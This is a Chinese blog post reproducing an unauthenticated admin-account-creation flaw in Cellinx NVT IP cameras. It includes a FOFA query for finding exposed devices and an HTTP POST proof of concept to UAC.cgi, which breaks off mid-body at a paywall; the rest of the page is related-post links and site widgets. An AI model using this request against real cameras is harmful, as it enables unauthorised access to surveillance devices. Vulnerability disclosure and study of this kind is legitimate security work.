Cellinx NVT 摄像机 UAC.cgi 任意用户创建漏洞复现

已于 2024-01-16 21:40:21 修改
阅读量648 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-01-16 21:37:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135635861
版权

0x01 产品简介

Cellinx NVT IP PTZ是韩国Cellinx公司的一个摄像机设备。

0x02 漏洞概述

Cellinx NVT 摄像机 UAC.cgi接口处存在任意用户创建漏洞,未经身份认证的攻击者可利用此接口创建管理员账户,登录后台可查看敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:body="local/NVT-string.js"

0x04 漏洞复现

PoC

POST /cgi-bin/UAC.cgi?TYPE=json HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"jsonData":{"username":"guest","password":"","option":"add_user","data":{"username":"test123","password":"test12
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Cellinx NVT 摄像机 GetFileContent.cgi任意文件读取漏洞 (CVE-2023-23063)
0xSec
12-16 812
CellinxNVTv1.0.6.002b版本存在安全漏洞,该漏洞源于存在本地文件泄露漏洞,攻击者可读取系统密码等敏感信息。
Cellinx NVT 摄像机 GetFileContent.cgi任意文件读取(含批量验证poc)
weixin_43567873的博客
04-17 42
Cellinx NVT 摄像机 GetFileContent.cgi任意文件读取(含批量验证poc)
community-nvt-feed-current.tar.bz2
08-12
截止今天最新版本的community-nvt-feed-current.tar.bz2,包含nvt和cve的漏洞细节。
韩国某摄像头公司存在未授权添加用户漏洞[漏洞复现]
Liyu_6618的博客
02-01 391
韩国某摄像头公司存在未授权添加用户漏洞[漏洞复现]
存在链接注入漏洞_【安全提示】CNVD发布近期关注度较高的产品安全漏洞(20200323-20200329)...
weixin_36452340的博客
12-16 306
境外厂商产品漏洞1、GitLab不当授权漏洞GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。GitLab(社区版和企业版)6.8版本至11.11版本中存在安全漏洞。攻击者可通过发送特制的请求利用该漏洞绕过登录限制。参考链接:https://www.cnvd.org...
复现cellinx摄像设备 未授权漏洞_50
fushuang333的博客
02-16 510
复现cellinx摄像设备 未授权漏洞,通过未授权访问可以创建用户进入后台,可能造成系统功能破坏。
Centos 7 | OpenVAS 9 | 漏洞评估检测
我是一块小石头
11-20 609
OpenVAS 9 借鉴博客 外文博客链接 国内有人翻译的链接 预备工作 关闭selinux setenforce 0 vim /etc/selinux/config 修改参数:SELINUX=disabled 安装依赖 yum install wget bzip2 texlive net-tools alien gnutls-utils 添加仓库 wget -q -O - ...
OpenVAS漏洞评估系统
xysoul的专栏
04-17 3949
OpenVAS是一款开放式的漏洞评估工具,主要用来检测目标网络或主机的安全性。其强大的评估能力来自于集成的数万个漏洞测试程序,这些测试程序以插件的形式提供,可以从官方网站免费更新。 OpenVAS漏洞检测和扫描" style="margin:0px; padding:0px; border:0px; list-style:none">     10.2.1 OpenVAS的工作组
nvt_wifi.rar
07-07
标题中的“nvt_wifi.rar”很可能是一个针对特定设备或平台的WiFi驱动程序的压缩包,主要针对Linux操作系统。在Linux环境中,驱动程序是操作系统与硬件设备之间的桥梁,它允许操作系统控制和利用硬件的功能。WiFi驱动...
nvt_pack_tool.rar
12-30
例如,创建一个新的压缩包可以使用`nvt_pack_tool pack [源文件或目录] [目标压缩包]`命令,解压则用`nvt_pack_tool unpack [压缩包] [解压目标目录]`。工具还支持高级选项,如密码保护、文件过滤等,满足不同需求。...
openvas-nvt-feed-current.tar.bz2
11-29
openvas离线更新包,主要是漏洞库及插件库!需要的可以下载
struts2-052漏洞学习
qq_44312507的博客
12-17 733
struts2-052漏洞学习文档 一、了解漏洞 1.struts2是什么? Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其...
OpenVas 漏洞扫描器使用教程
热门推荐
xianjie0318的博客
07-17 3万+
Openvas简介 Openvas是开源的,是Nessus项目分支,用于管理目标系统的漏洞,检测目标网络或主机的安全性。它的评估能力来源于数万个漏洞测试程序,openvas 早起版本还有一个客户端,现在的版本已经不提供客户端程序,现基于B/S(浏览器/服务器)架构进行工作,执行扫描并提供扫描结果。 Openvas架构 Openvas Manage: 1、OpenVAS管理协议(OMP)...
几款Linux系统漏洞扫描、评估工具简介
晨曦蜗牛
02-02 2万+
一、Nmap Nmap 是一种常用工具,可用于判定网络的布局。我们可以在网络上使用 Nmap 来查找主机系统以及打开这些系统的端口。 1. 安装Nmap。 [root@GeekDevOps ~]# yum -y install nmap 使用示例(最简单的使用方法就是nmap 域名或ip): [root@GeekDevOps ~]# nmap 10.8.34.1 Start
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 601
轻量部署,安全和业务连续性才能两不误
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 251
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 202
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
【技术升级】Docker环境下Nacos平滑升级攻略,安全配置一步到位
IT后浪的博客
07-23 495
目前项目当中使用的Nacos版本为2.0.2,该版本可能存在一定的安全风险。软件的安全性是一个持续关注的问题,尤其是对于像Nacos这样的服务发现与配置管理平台,它在微服务架构中扮演着核心角色。随着新版本的发布,开发团队会修复已知的安全漏洞,并增强系统的整体安全性。因此要及时升级Nacos,避免因为安全问题,对项目造成影响。
如何开启或者关闭 Windows 安全登录?
qq_57728300的博客
07-22 635
你知道 Windows 安全登录是什么吗?本文教你如何开启或者关闭它。
nvt_dmabuf
05-15
nvt_dmabuf是一种用于在不同设备之间传输数据的机制。它是一个内核模块,通过DMA(直接内存访问)实现了内存映射和共享,可以在不同的进程和设备之间传递数据。在使用nvt_dmabuf时,需要先创建一个dmabuf对象,然后使用ioctl函数将其导出或导入到其他进程或设备中。nvt_dmabuf可以用于多种场景,如图像处理、视频编解码等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值